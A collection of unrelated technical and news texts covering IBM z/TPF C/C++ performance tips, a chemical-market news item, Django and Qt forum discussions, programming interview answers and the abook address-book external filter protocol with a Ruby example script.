The compiler family and the object module formats have changed. The z/OS C/C++ compiler is no longer used and is replaced by gcc and g++. The PM1-PM3 load module and OBJ/XOBJ relocatable object formats were replaced by a single format called ELF, which is very similar in its relocatable (unlinked) and absolute (linked) forms and more readily understood than its predecessors. Every detail of the ELF format is well documented. The following recommendations take all of these factors into consideration.

1. Disable the "common block" unless you understand its implications and costs. This Fortran-like extension of the C language is unique to gcc, and is enabled by default. Use the -fno-common command line option to disable it. While inspired by Fortran, the term "common block" as applied to gcc is a misnomer; individual data objects are marked common in the relocatable object, not grouped into isolated blocks. Common data objects may reside in any ELF section. Use of this feature causes all data objects declared in file scope to be marked common in the relocatable object. A later link-edit operation against two or more different relocatable objects maps identically named data objects marked common into the same storage address, irrespective of their possibly different types. This behavior can cause some seemingly unreproducible and asynchronous run-time errors when it is used naively. You can use the common block safely only if you are: (a) aware that it is in effect, and (b) understand its effects and scope. g++ does not use the common block, so if you choose to use it, understand that it is restricted to C only. Otherwise, use the -fno-common option. Using the common block also means that you are going to write to a copy-on-write memory page. Avoid this practice for performance reasons.

2. Use static inline functions instead of preprocessor macros whenever possible. The compiler generates inline code at the call point for any function that is defined as static inline.
This omits the linkage overhead and external reference generation. Inlined functions are just as fast as preprocessor macros and much easier to maintain, because you can represent complex logic without having to worry about preprocessor rules. gcc will not generate any inline code at -O0; you must optimize at level -O1 or higher.

1. Avoid altering constants. Not only does altering constants risk unnecessary copy-on-write activity, but certain optimization techniques merge constants. Altering an in-memory value that you think is constant and isolated might have adverse consequences.

2. It is possible to debug optimized code. There is no longer any reason to develop and test at no optimization (-O0). You can safely debug at all levels of optimization. Understand that certain optimizations might reorder instructions, remove variables from the debugger view, eliminate common expressions, eliminate useless instructions, or eliminate intermediate data objects, any of which can be confusing as you debug. Depending on your tolerance for these kinds of changes to your original code, you might wish to lower the optimization level during unit test. You are free to make the choice that suits you.

3. The compiler is better than you are at optimizing code. Do not try to optimize code by moving statements around, sequencing automatic storage, or engaging in similar techniques -- the compiler will do this anyway as long as you choose to optimize at levels 1 through 3. Instead, cooperate with the optimizer by inlining aggressively.

4. Consider using the maximum level of optimization (-O3) instead of lower levels. In gcc and g++, there are over 100 possible optimization techniques that you can select individually, or you can enable over 80 of the most useful of these by simply passing the level 3 optimization option (-O3) on the command line.
Most significantly, the compilers attempt to generate inline functions that meet certain size tests without you having to do anything in code.

5. Avoid writing inline assembler. gcc and g++ both have the asm() construct, which permits you to write inline assembler instructions within its bounds. The drawback to using inline assembler is that it impedes optimization. Avoid using it except when absolutely necessary.

6. Use internal linkage instead of enter/back or external linkage whenever possible. A function call between members of the same shared object library occurs without interference from the operating system, which results in the shortest path length during a control transfer. External function calls (calls on external labels between members of different shared object libraries) call enter/back indirectly. Enter/back linkage involves system intervention whether it is used directly or indirectly. Use either enter/back or external linkage if you must; but consider your alternatives.

7. Pass values as function arguments instead of referring to file-scoped, static, or extern storage whenever possible. The goal is to keep as many data objects on the stack or in the heap as possible. As previously explained, using data objects outside of these storage areas risks unnecessary copy-on-write activity.

8. Avoid writing functions that have more than 5 arguments. The zSeries ELF Application Binary Interface Supplement document states that up to five integer arguments are passed from the calling function to the called function in general registers 2-6. If there are six or more arguments, the additional arguments are saved in storage, which impedes high performance.

9. When writing assembly language subroutines for C/C++ programs, use PRLGC instead of TMSPC as the prolog macro. The TMSPC macro has a TPF 4.1 parameter-passing interface, which means the macro allocates storage for and stores the register-resident arguments into a simulated Type-1 parameter list.
This allows you to migrate existing assembler programs of this type more easily. However, this parameter-handling scheme always incurs extra path length. The PRLGC macro respects the ELF ABI use of R2-R6, which avoids the excess instructions.

1. Use C++ only when your needs require its features. Compilation in C++ generates larger code and has certain runtime overhead that makes C++ marginally more expensive than C in terms of performance. Code in C++ where appropriate; otherwise, code in C.

2. A struct and a class are the same thing in C++. Even a struct has default constructors (instantiation and copy), a default assignment operator, and a default destructor. Like a class, a struct might have member functions or virtual functions (or both). Declaration of a const data member has initialization constraints that do not exist in C.

3. C++ support is at the 1998 ISO standard level. Treat namespaces as mandatory. The std:: namespace exists in all the standard C++ headers and must be referenced with a using statement if you plan to use its identifiers without redundant scope qualification. The objective is to keep the global namespace uncluttered. In the spirit of this goal, partition your user-defined classes and data objects into uniquely identified namespaces, too.

4. Prefer the C language stdio.h family to the C++ stream classes derived from ios. These classes (fstream, istream, ostream, iostream, and relatives) multiply inherit in both lateral and vertical directions; they call all required constructors and destructors at the appropriate times. Their C language counterparts, such as the printf function, can usually perform the same job at a much lower cost.

5. Beware of temporary objects. The C++ compiler generates temporary objects when it needs to preserve intermediate results (or rvalues), most commonly in the resolution of an arithmetic-style expression that consists of more than one operation.
Certain types of conversion operations and initializations can also cause the compiler to generate temporaries. This is not serious when the operation involves plain old data types (such as int, double, char, and similar), but it can impact performance when user-defined data types are the operands. A temporary object impacts performance because the constructor and destructor of the object must be run during the evaluation of the expression. In addition, the compiler might generate code to run a copy constructor if the particular operation requires it. Just to make all this a little worse, the compiler can allocate temporary objects from the default source (usually the heap) used by the allocator method of the class, which is more overhead than you might notice as you write that innocent-looking expression. Sometimes there is no alternative to creating an rvalue. However, if you are designing a class with overloaded operators and conversion functions, you often can handle the operation and assignment at the same time, which can prevent the compiler from generating temporaries.

6. Hide inline class methods. g++ treats function members of a class (methods) as inline when their definition appears in the context of their enclosing class declaration and optimization levels permit inlining. C++ language rules require that the compiler generate external labels for such methods, even when they are unnecessary. The use of templates amplifies this behavior. Use the -fvisibility-inlines-hidden command line option to prevent the compiler from generating these externals. This reduces module size and saves useless relocations from happening when the module is loaded.

7. Improve your knowledge of C++ at every opportunity. C++ is not a simple programming language that is useful for every circumstance. It has many features that have subtle but iron-clad meanings. Troubles arise when programmers attempt to violate those meanings.
There are many choices available to you to solve all kinds of problems; knowing which to choose can mean the difference between a poorly performing program and one that works efficiently. We strongly suggest that you read journals, books, and other publications designed to extend your understanding of the C++ programming language.

Read the section on file-scoped static, recommending pass by value. I have need for a 700-entry array of char * [3][ ] with {"100", "literal constant messages", "2254"}, ... as an initializer, in a TPF 4.1 implementation. Two methods of a new class will reference the array, so my first thought was to define a file-scope, static const. Given the array is ONLY read, do you see a performance hit - or worse, code failure - for having a 'large' char * array as static? Thoughts?

Passing this array of arrays by value might not make sense -- that's a lot of space you're talking about. You'd have to make a copy of all the data you're going to pass (over 16 KB), which -- all by itself -- will occupy either 5 or 6 pages (depending on how deeply into its first page the [0][0]th element is) on the parm list. Or you could much more simply and cheaply just pass a pointer to the [0][0]th element and be done with it; in other words, I'd recommend you pass this particular argument by reference.

Looking forward to z/TPF, you have to consider the addressing mode (AMODE) of the callee in this discussion. If you have an AMODE=31 callee, then it might be worthwhile to make a copy of this aggregate in below-the-2G-bar storage.

As to where the 'master copy' of this array of arrays lives, have you considered TPF global storage? If these are truly read-only or updated very infrequently, they'd make a nice global, as well as being addressable to all programs. But I'll presume you've investigated this approach and rejected it for some valid reason.
Limiting myself to a discussion of z/TPF (not TPF 4.1), we are left with three other places we could store this data, and in every case we will pass it to functions by reference, via a pointer to element [0][0]:

1. In a control section of the program, either .data or .rodata, depending on how you've qualified your aggregate. This means you'd code the array of arrays and its initializers at file scope. It goes into control section .data if it's not qualified as read-only, or into control section .rodata if you've made it read-only with the 'const' qualifier. As long as you don't write on this data, there is no performance loss whatsoever. If you write on any of those pages, you start incurring the expense of copy-on-write behavior, which will happen just once per affected page.

2. On the stack. Here we need to consider the overhead involved in making that stack-based copy from the constants stored in the .rodata section of your program: you simply take on the cost of copying those 5 or 6 pages yourself.

3. On the heap. This is probably the safest approach, usable by all programs, but it is also the most expensive. You would incur the overhead of making the copy just as in #2, and then you have to allocate and later free that memory, unless you're close enough to EXITC that a memory leak of that size won't hurt you.

So, which would I choose if I wanted to keep resource consumption at an absolute minimum? I'd go for #1, presuming that I have a 100% read-only use for the data and I know that my callee and all of its downline users of those data share my addressing mode. If I have callees of unknown AMODEs, I think I'd go with #3. While we certainly want to avoid otherwise avoidable expenses, we have to remember that the most expensive program of all is the one that doesn't work. If you would like to have a further, more in-depth discussion on this, please feel free to contact your CSR.

Note: Additional information on this topic can be found at:
https://www.ibm.com/developerworks/community/blogs/zTPF/entry/ztpf-c-performance-hints?lang=en
22 January 2010 06:14 [Source: ICIS news] SINGAPORE (ICIS news)--Recent shutdowns of purified terephthalic acid (PTA) lines at China-based Dahua Yisheng and Ningbo Formosa Chemical Fibre Corp (FCFC) may support PTA prices in the country, traders said on Friday. Dahua Yisheng's 1.5m tonne/year plant had been shut down, a company source said. The shutdown was expected to last five days and would cause an estimated production loss of around 20,000 tonnes of PTA, he added. Ningbo FCFC had shut down its 600,000 tonne/year unit on Thursday for planned maintenance and expected to restart it in a week, the company source said. The production loss due to the shutdown was estimated at around 13,000-14,000 tonnes of PTA, the source added. The shutdowns could underpin market prices, traders said, even as bearish sentiment at the Zhengzhou Commodity Exchange saw a drop in PTA futures. Spot prices for Taiwanese PTA cargoes remained firm at $965-970/tonne (€685-689/tonne) CFR (cost and freight) ($1 = €0.71).
http://www.icis.com/Articles/2010/01/22/9327970/plant-shutdowns-may-underpin-china-pta-prices-traders.html
On Saturday, May 28, 2011, Mateusz Harasymczuk <ma...@harasymczuk.pl> wrote:
> Recently, I had to make more than one admin class in the admin.py file.
> I have never had a situation like this before.
> I kept my admin classes in separate files in an admin module.
>
> It came to me that after each class definition you have to make
> admin.site.register(Class, AdminClass)
>
> Hence:
>
> - Where is the best place to put this call?
> after an AdminClass definition?
>
> Try it, it looks ugly

Says you. Given that admin registration has always been like this, that means I've been "trying it" for about 4 years, and I don't find it ugly at all.

> - At the end of the file with the other registers?
>
> it is similar to signals connect and template_tag registering.
>
> Therefore it should be similarly decorated by a decorator.
>
> @register_admin(class=ModelName)
> class ModelAdmin:
>     pass
>
> what do you think?

I think this misses several important points.

Firstly, class decorators are a relatively recent addition to Python. They were only added in Python 2.6, and Django needs to support Python 2.5.

Secondly, a class decorator must be used at the same time as the class is declared. The statement-based registration approach means you can define a class in one module, and then register it in a different module.

Thirdly, with statement-based registration you can also include business logic as part of the registration process; e.g., make a programmatic decision as to which admin registration to use at runtime. This sort of conditional behavior isn't an option with class decorators.

> BTW:
> This one is even more ugly than the previous one!
>
> How about changing:
>
> model_method.allow_tags = True
> model_method.short_description = _('Model Method')
>
> into:
>
> @options(allow_tags=True, short_description=_('Model Method'))
>
> or:
>
> @allow_tags
> @short_description(_('Model Method'))
>
> ?

I'm more sympathetic to this idea.
This seems like a case where decorators would be a good match. In fact, it could be a slight improvement, because misspelling a function annotation won't raise an error, but a misspelled decorator will. I.e.,

def myfunc(): ...
myfunc.short_descriptionnnnn = "xxx"

isn't an error, but

@short_descriptionnn("xxx")
def myfunc(): ...

is, because the decorator named short_descriptionnn doesn't exist.

Yours,
Russ Magee %-)
https://groups.google.com/forum/?_escaped_fragment_=topic/django-developers/Ebe-nGumjug
Print out the numbers that are NOT repeated; in other words, if the user inputs uni[] = {1,2,4,2,5}, the 2 will not be printed out because it's repeated. Here is what I got so far:

import java.util.*;

public class Ejer4 {
    public static void main(String args[]) {
        Scanner reader = new Scanner(System.in);
        int[] uni = new int[5];
        int[] apples = new int[5];
        int var = 0;
        for (int i = 0; i < 5; i++) {
            System.out.println("Input a number: ");
            uni[i] = reader.nextInt();
        }
        for (int y = 0; y < uni.length - 1; y++) {
            if (uni[y] != uni[y + 1]) {
                apples[y] = uni[y];
            }
        }
        for (int j = 0; j < apples.length; j++)
            System.out.println("The non-repeating numbers are: " + apples[j]);
    }
}

It works kind of well, but it still prints out one of the repeated numbers, which isn't good. It also prints out 0 at the end and 0 in place of the repeated number; that's understandable given that the array has a fixed size. So I hope I get some help. Thanks.
http://www.dreamincode.net/forums/topic/246766-array-processing-detail-help/page__p__1434440
Punit Jain

@devesh Do you always follow syntax? There is a thing called logic. Btw, you can modify the function internally.

Push the elements onto a stack in inorder, then pop each element and assign its successor. Complexity O(n).

Stack stack;

Inorder (node *root) {
    if (root == NULL)
        return;
    Inorder (root->left);
    stack.push (root);
    Inorder (root->right);
}

node *p1 = NULL, *p2 = NULL;
while (!stack.empty()) {
    p2 = stack.pop();
    p2->next = p1;
    p1 = p2;
}

The subarray should be "15 1 11 -15 18", not "15 1 11". Pseudocode:

sum = 0, max = 0, start, end
a = 1
for i = 1 to N {
    sum = sum + arr[i];
    if (sum > max) {
        max = sum;
        end = i;
        start = a;
    }
    if (sum < 0) {
        a = i + 1;
        sum = 0;
    }
}

The maximum-sum subarray then runs from arr[start] to arr[end].

Do a BFS from the start node and print the nodes at distance K. The other solution:

Distance (Node *node, dist, k, Node *parent, Node *child) {
    if (node == NULL)
        return;
    if (dist == k) {
        print (node->data);
        return;
    }
    // Passing parent and child to avoid visiting the same node again.
    if (node->left != child)
        Distance (node->left, dist+1, k, node, NULL);
    if (node->parent != parent)
        Distance (node->parent, dist+1, k, NULL, node);
    if (node->right != child)
        Distance (node->right, dist+1, k, node, NULL);
}

main () {
    Distance (node, 0, k, NULL, NULL);
}

I was asked the same question: write a recursive program to compute the number of paths from top left to bottom right. I couldn't write it at the time, but later I tried at home and did it. Here is the pseudocode:

int Number_of_Paths (node *head) {
    if (!head)
        return 0;
    if (head->right && head->down)
        return (Number_of_Paths(head->right) + Number_of_Paths(head->down));
    else if (head->right)
        return Number_of_Paths (head->right);
    else if (head->down)
        return Number_of_Paths (head->down);
    else
        return 1;
}

This looks like a good solution. nCr can be written as nC(n-r), so (m+n-2)C(n-1) can also be written as (m+n-2)C(m-1).
So it can be used either way.

The approach would be right only if the string length is even; it wouldn't work for a string of odd length.

Do ps -AL | grep pid. The first column is the process id and the second column is the thread (LWP) id; if both are the same, it's the process itself, otherwise it's a thread.

A memory leak is when dynamically allocated memory is not freed after its use.

To implement an integer array of size array_size:

int *p = (int *) malloc (sizeof(int) * array_size);

Now you can assign values using p[i] = something (for i = 0 to array_size-1) and access them the same way.

Reverse the whole string, then reverse it word by word:

reverse (str);
while (*str != '\0') {
    start = str;
    while (*str != ' ' && *str != '\0') {
        str++;
    }
    end = str - 1;
    while (start < end) {
        char c;   // to swap characters
        c = *start;
        *start = *end;
        *end = c;
        start++;
        end--;
    }
    if (*str != '\0')
        str++;
}

This one is a classic problem: classic-puzzles.blogspot.in/2006/12/google-interview-puzzle-2-egg-problem.html

Pick any 6 balls and divide them into groups of 3 each. If the groups weigh the same, check the remaining two and you will find the heavier ball. If they are not the same, take the 3 from the heavier side, pick any two of them and weigh them: if they are the same, the third one is heavier; otherwise it's clear which one is. So you have to weigh only two times.

const char *p, char * const p: the first is a pointer to constant characters, i.e. the value pointed to by p is constant. The second is a constant pointer to character, where the value of p itself (the address) is constant.

Yes, if it is not a weighted graph. It can be done by slightly modifying the BFS algorithm: for u, and for each v among the edges connected to u (just a reference to the BFS algorithm), if v is already marked gray, check whether d(v) == d(u) + 1 and, if so, increment the number of shortest paths to v by 1; otherwise, if v is white, set its number of shortest paths to 1 and d(v) = d(u) + 1. You could also modify Dijkstra's algorithm, but the complexity would increase (in the case of a weighted graph).

Use BFS to find the connected components of the undirected graph and return the largest one.
O(|V| + |E|).

Using the expected value of the first 100 outcomes: 90 black, 10 white. That leaves 810 black and 90 white, so the probability would still be 9/10.

There are two cases in which India wins:
1) Akbar tells the truth and Amar tells the truth: 3/4 * 3/4 = 9/16.
2) Akbar lies that India lost, and Amar lies to Anthony that "Akbar told me India won": 1/4 * 1/4 = 1/16.
So the total probability of India winning would be 9/16 + 1/16 = 10/16. Correct me if I am wrong.

The code is correct and produces the right output. What is the problem with using a global variable? Or are you unfamiliar with them?

This means that each node will contain its data plus the sum of all nodes' data in its right subtree: node->data = node->data + (sum of all nodes in right subtree). A reverse inorder traversal does the work for us. Code:

int sum = 0;   // global variable

sum_max (node *root) {
    if (root == NULL)
        return;
    sum_max (root->right);
    sum = sum + root->data;
    root->data = sum;
    sum_max (root->left);
}

Algo: for each character in the string, if it is a left part, i.e. (, {, [, push it on a stack; else if it is a right part, pop from the stack and check whether it is the matching left parenthesis. If any case doesn't match, return FALSE. Otherwise return TRUE.

Negative numbers are stored as 2's complement. Assuming a 32-bit integer, the answer would be fffffff0.

1. Get to the middle element of the string.
2. Take two pointers p1 and p2 pointing to the middle element (if the string is of odd length, or to the two different middle elements in case of even length).
3. while (p1 >= start, p2 <= end) {
       if (*p1 != *p2)
           return FALSE;
       p1--;
       p2++;
   }
   return TRUE;

Algo:
1. Find the longest palindrome in the string.
2. Repeat the procedure for the remaining two strings (left and right side of the palindrome).

Assume the string has all distinct characters; the total number of permutations is n!. Algo: start from the first character and traverse to the end. Find how many characters rank before this one; if that count is x, then we know x * (n-1)! permutations are ranked above this one.
Repeat the procedure for every character in the string.

int n = strlen(str);
int rank = 0;
for (i = 0; i < n-1; i++) {
    int x = 0;
    for (j = i+1; j < n; j++) {
        if (str[i] > str[j])
            x++;
    }
    rank = rank + x * ((n-i-1)!);   // (n-i-1)! denotes the factorial
}
return rank;

Use randomized selection to find the 2nd largest element, i.e. the element at the (N-1)th position.

Solution 2:

int max1 = 0, max2 = 0;
for i = 1 to N
    if (A[i] > max2)
        max2 = A[i]
    if (max2 > max1)
        swap (max1, max2)
return max2

Hashing would be the best approach for O(n). Let n be the length of the array. Before inserting each element into the hash table, look it up: if found, decrement n; otherwise insert it into the table. Return n.

What about hashing? Before insertion, check whether the element is already present: if not, insert it with value 1, and if yes, increment its value by 1.

Is it to find the zeros in binary format? If yes, then:

count = 0
while (n > 0) {
    count = count + !(n & 1)
    n = n >> 1   // right shift by 1
}
return count

To count them in decimal format:

count = 0
while (n > 0) {
    count = count + (n % 10 > 0 ? 0 : 1)
    n = n / 10
}
return count

Algorithm for the problem:

j = 1
for i = 1 to N
    if (A[i] > 0)
        A[j] = A[i]
        j++
for i = j to N
    A[i] = 0

This takes O(n) without using any buffer.

Sorry, it was a right shift; I have changed this. Shalini, can you please elaborate through code? Thanks!
- Punit Jain, June 30, 2013
https://careercup.com/user?id=13095672
QML TreeView using only QtQuick 2 works fine? - Diracsbracket last edited by Diracsbracket

Hi. Quite a few people, including myself, have been regretting and wondering why TreeView is only available in Controls 1, which has been deprecated since Qt 5.12. As it turns out, however, it seems quite straightforward to adapt the TreeView code to depend exclusively on Controls 2 elements. For instance, I just copied and merged all the QML code for a TreeView into a single .qml file that only depends on the following imports:

import QtQuick 2.15
import QtQuick.Controls 2.15
import QtQml.Models 2.15

A working TreeView then only requires a local copy of the original TableViewColumn.qml file (which itself only depends on the QtQuick 2.15 module) and a local copy of the QQuickTreeModelAdaptor class source (which simply implements a QAbstractListModel).

Internally, the original TreeView uses ScrollView, ListView and FocusScope, all of which have their equivalents in QtQuick 2 (the only property I needed to comment out was the frameVisible property, which does not exist in ScrollView 2, and I got rid of the viewport property). Aside from the styling parts, which I either eliminated or hard-coded, and the scrollbar code, which I currently disabled, it seems to work just fine: the tree displays, expands/collapses and behaves as expected, so far. I wanted to upload the code for that self-contained TreeView.qml file here, but unfortunately, posts are not allowed to be that long.

That sounds great. Can you share it via Github?

- Diracsbracket last edited by Diracsbracket

@mnesarco said in QML TreeView using only QtQuick 2 just works fine?:

Can you share it via Github?

I uploaded the filesystembrowser example using the modified TreeView here:

A question: Is it possible to make a copy of QQuickTreeModelAdaptor in an LGPL-licensed program, or would this violate the LGPL?

- jsulm Lifetime Qt Champion last edited by

@maxwell31 What exactly do you mean? Do you want to modify QQuickTreeModelAdaptor?
Or why else would you need to "copy"? If you want to modify QQuickTreeModelAdaptor, then you have to make your changes open source (an LGPL requirement).
https://forum.qt.io/topic/122814/qml-treeview-using-only-qtquick-2-works-fine
, Martin Lorenz wrote:
> is there any possibility to tell abook which fields it should return
> for --mutt-query or - even better - is there a hidden query feature
> somewhere, that returns arbitrary fields?

Well, as a practical example of what you can do with external filters... now there is. Files attached. :)

> i'd like to use abook to make a quick phone number lookup from the
> commandline

You can just use

abook --convert --infile ~/.abook/addressbook --outformat custom_query \
  --outoption query=Martin

and abook will make a phone number lookup by default. Or you can control more precisely what you want your search to be based on, and what it should return, and even give several query strings:

abook --convert --infile ~/.abook/addressbook --outformat custom_query \
  --outoption search_fields=name,email \
  --outoption return_fields=name,phone,workphone,city \
  --outoption query=martin \
  --outoption query=cedric

--
Cédric

Hi,

Below is a copy of doc/README.external_filters, describing the protocol for communications between abook and external filters. Please have a look. Comments most welcome, especially on the set of commands. It is the time to check whether some things are lacking or need to be revised, etc., in order to have a convenient-to-use protocol. :)

What is this document?
======================

Abook is written in the C programming language. Although this is fine for the application itself, it might not always seem the most obvious choice when it comes to writing a filter for a new format. Writing a filter involves processing data/text, and at that task, many languages are more convenient than C. For this reason, abook provides a protocol for external programs to communicate with abook itself, thus allowing import/export filters to be written easily without the need to tread with C sources. This document explains how to write a new filter in the programming language of your choice, be it Perl, Python, Ruby, or even a shell script.

How does it work?
=================

Abook launches the external program/script, and establishes three channels of communication with it:

* A command channel, which the filter will use to issue instructions to abook (like "give me the value of field X for current item", "commit this item to database", etc.).
* A data channel, by which the filter receives requested data or error codes from abook.
* And in the case of an export filter, an output channel, into which the filter writes the resulting content.

These channels are respectively the standard error, the standard input, and the standard output of the external filter. That is, a typical export filter will do something along the lines of:

1/ Issuing a command to abook, by writing it to stderr. For instance "field email" for requesting the value of the 'email' field of current item.
2/ Read the answer to this query on stdin.
3/ Write to stdout the data gathered from the database, in the exporting format.

Import filters operate in a similar way.

Commands
========

The set of available commands depends on what your filter does. Some commands are available only to import filters, some only to export filters, and some to both. We will describe each of them below.

Commands available in import mode only
--------------------------------------

* next_line
  - Description: requests the next line from the input file to process.
  - Answer: the requested line.
  - Errors: none.

* field <name> = <value>
  - Description: sets field <name> of current item to <value>
  - Answer: none.
  - Errors:
    - OK
    - malformed request
    - undeclared field
    - OK (new field successfully declared)
  - Note: the automatic declaration of a new field depends on the value of the 'preserve fields' abook configuration option; unknown fields will be accepted only if this option is set to "all".

* commit_item
  - Description: puts the current item into database, and then creates a new empty item to work with.
  - Answer: none.
  - Errors:
    - OK
    - no 'name' field.
  - Note: an item is required to have a 'name' field to be accepted in database.

Commands available in export mode only
--------------------------------------

* next_item
  - Description: advances to the next item in database, and closes the communication channels when there are no more items left.
  - Answer: value of 'name' field, or empty line to indicate end of items.
  - Errors: none.
  - Note: when the filter starts, the current item already points to the first, so there is no need to invoke 'next_item'.

* field <name> [ , <name> ... ]
  - Description: requests the value of <name> field.
  - Answer: the corresponding value.
  - Errors: none.
  - Note: if several field names are given, the first non-void value found is returned.

* field_name <name>
  - Description: requests the public name (intended for humans rather than software) of field <name>.
  - Answer: the requested name, or empty string if unknown.
  - Errors: none.

* enumerate [ <options> ]
  - Description: iterates over the fields of current item.
  - Answer: one line for the field name, one line for its value.
  - Errors: none.
  - Notes:
    - this command must be called repeatedly, until meeting an empty line indicating end of fields; it does not return every field in one run.
    - <options> is an optional comma-separated list of options altering the behavior of this command:
      - all: don't only return fields having a value, return every known field.
      - equal: instead of returning two lines, one for the field name and one for the value, return a single line using the format "<name>=<value>".

* emails
  - Description: requests all email addresses of current item.
  - Answer: one line for each address, an empty line to indicate the end.
  - Errors: none.

Commands available in both modes
--------------------------------

* errors [ filter | stderr | none ]
  - Description: sets the errors reporting mode (default is 'stderr').
    - filter: when an error code (actual error or OK) is to be returned for a command, send it to the filter (thus a read is necessary).
    - stderr: when an error occurs (an actual error, not an OK code), print it to abook's standard error.
    - none: no error is reported in any way.
  - Answer: none.
  - Errors: (depending on the mode just being set)
    - OK
    - invalid value

* stop [ <message> ]
  - Description: ends the processing, cutting the communication channels with abook; can display an optional message on stderr.
  - Answer: none.
  - Errors: none.

* puts <message>
  - Description: displays <message> to abook's stderr.
  - Answer: none.
  - Errors: none.
  - Note: as the standard error of the external filter is used to issue commands to abook, this command is the only way to give feedback on the user's terminal.

* options
  - Description: queries the options provided to the filter.
  - Answer: one line for each specified option, an empty line to indicate the end of list.
  - Errors: none.
  - Note: these are options specific to the filter, not the options from abook's configuration file (abookrc). For the latter, use the abook_option command below.

* abook_option <option_name>
  - Description: queries the value of the given abook configuration option.
  - Answer: the requested value.
  - Errors: invalid option.

Pitfalls
========

When you issue commands that return values or error codes, be sure to completely read abook's answers before issuing another such command. You cannot, for instance, ask for a list of email addresses, read just the first one, and then request the value of the 'name' field, expecting the latter at the next read. Reads must be complete, and in the order of the issued commands.

Passing options to the external filter
======================================

Options can be passed in two ways:

1/ From the command line, with --inoption <value> and/or --outoption <value>.
2/ Via the description file, using "import_option <value>" and "export_option <value>".

In each case, it is possible to pass an arbitrary number of such options. From the filter, they can be fetched using the 'options' command.

Description file
================

Abook needs a way to know about available external filters. It learns about them through description files (see the example below); <name> is the name of the format the filter handles. Abook looks for this file in the following places:

- the user abook's directory ($HOME/.abook) and its subdirectories.
- the system filters directory ($prefix/lib/abook) and its subdirectories.

This file consists of lines made of a keyword, followed by whitespace and an associated value. Possible keywords are:

- import_path: the path of the program/script to call when using this filter for importing.
- export_path: ditto, for exporting.
- description: a description of the format handled by this filter; this field is mandatory for the filter to appear in the list given by the --format command line option or in the import/export screens within abook.
- import_option: an option to pass to the import filter; several such lines can be provided.
- export_option: ditto, for the export filter.

There can be one or both of 'import_path' and 'export_path', depending on what your filter implements. The paths can be given absolute, or relative to the base search directory.

Example
=======

Goal
----

Abook integrates quite well with mutt, thanks to its --mutt-query command line option. Unfortunately, the fields it uses for searching are not configurable. Let's remedy this by re-implementing a --mutt-query feature with arbitrary search fields, using the Ruby language, as an example of an export filter.
The files
---------

We will need the following files:

- a description file, called 'mutt_query_filter.external'
- an export script (executable bit set), called 'mutt_query.rb'

We will put those two files in a directory $HOME/.abook/mutt_query/. Their content follows...

mutt_query_filter.external
--------------------------

export_path mutt_query/mutt_query.rb
description mutt query with arbitrary search fields

mutt_query.rb
-------------

#!/usr/bin/ruby
def cmd(c); $stderr.puts c; end
def cmd_res(c); cmd(c); $stdin.gets.chomp!; end
def cmd_list(c)
  cmd(c)
  $stdin.each_line {|l|
    break if l.chomp! == ""
    yield l
  }
end

fields = Array.new
queries = Array.new

cmd_list("options") {|o|
  o.scan(/^(\w+)=(.*)$/) {|opt, val|
    case opt
    when "fields" then fields += val.split(",")
    when "query" then queries << val
    end
  }
}

cmd("stop No query.") if queries.empty?
fields = [ "name", "email", "nick" ] if fields.empty?

found = 0
while true do
  match = false
  fields.each {|f|
    next if (val = cmd_res("field #{f}")) == ""
    queries.each {|q| match = true if val =~ /#{q}/i }
  }
  if match
    name = cmd_res("field name")
    notes = cmd_res("field notes")
    puts "" if (found += 1) == 1
    cmd_list("emails") {|e| puts "#{e}\t#{name}\t#{notes}\n" }
  end
  break if cmd_res("next_item") == ""
end
puts "Not found" if found == 0

Usage
-----

You just have to put this (one single line) into your muttrc:

set query_command="abook --convert --infile ~/.abook/addressbook --outformat mutt_query --outoption fields=name,email --outoption query=%s"

The fields used for searching can be customized via the "--outoption fields=" option. Now, press the 'Q' key within mutt, enter your query, and voilà!

--
Cédric

Jaakko Heinonen wrote:
> Compiles and seems to work OK on Solaris 9 with these compile warnings:
> "ltdl.c", line 3716: warning: argument #4 is incompatible with prototype:
> [...]
> "filter.c", line 153: warning: assignment type mismatch:
> [...]

Fixed.
> I am still not a big fan of separate modules. IMO it adds unneeded
> complexity.

I don't think it adds much complexity code-wise. Now we have an interface for accessing the database, and I think it is a good thing, regardless of whether we use modules or a monolithic abook. My main concern about it was portability. I would have liked to just use plain dlopen(), but it doesn't seem the best option for multiplatform use, so I went down the libltdl path, which should ensure dynamic loading works reasonably well everywhere. But yes, as I noticed later, it does add some weight to the tarball...

> However it may prove to be useful in the future if people create "3rd
> party" modules.

I certainly hope so. :)

> Btw. Is there a reason to link all modules against (n)curses and
> readline?

No good reason, other than the fact that configure.in uses some readline and curses detection macros that set general compilation variables like LIBS, and hence affect every subdirectory. This could surely be avoided by some acinclude.m4/configure.in/Makefile.am tweaking...

--
Cédric

Short summary:
- Improved filters code.
- Handling of external filters.

I have made some use of variadic macros. This is in the C99 standard; I hope there are no compilers out there for which it is too "recent" (sic). Anyway... any tests, LaTeX phonebook filters, etc. welcome. ;)

--
Cédric

On 2005-10-31, Cedric Duval wrote:
> - interface between filters and abook in filters/filter_interface.h
> - helpers to easily write new modules.

These look very good.

> - Each filter is a module dynamically loaded when needed.

I am still not a big fan of separate modules. IMO it adds unneeded complexity. However it may prove to be useful in the future if people create "3rd party" modules. Btw. Is there a reason to link all modules against (n)curses and readline?

> - Native abook format is handled through a filter module like any other
> format.

Good.
--
Jaakko

> Compiles and seems to work OK on Solaris 9 with these compile warnings:

"ltdl.c", line 3716: warning: argument #4 is incompatible with prototype:
    prototype: pointer to void : "ltdl.c", line 2633
    argument : pointer to function(pointer to const char, pointer to void) returning int
"ltdl.c", line 3722: warning: argument #4 is incompatible with prototype:
    prototype: pointer to void : "ltdl.c", line 2633
    argument : pointer to function(pointer to const char, pointer to void) returning int
"ltdl.c", line 3726: warning: argument #4 is incompatible with prototype:
    prototype: pointer to void : "ltdl.c", line 2633
    argument : pointer to function(pointer to const char, pointer to void) returning int
"ltdl.c", line 3733: warning: argument #4 is incompatible with prototype:
    prototype: pointer to void : "ltdl.c", line 2633
    argument : pointer to function(pointer to const char, pointer to void) returning int
"ltdl.c", line 3740: warning: argument #4 is incompatible with prototype:
    prototype: pointer to void : "ltdl.c", line 2633
    argument : pointer to function(pointer to const char, pointer to void) returning int
"filter.c", line 153: warning: assignment type mismatch:
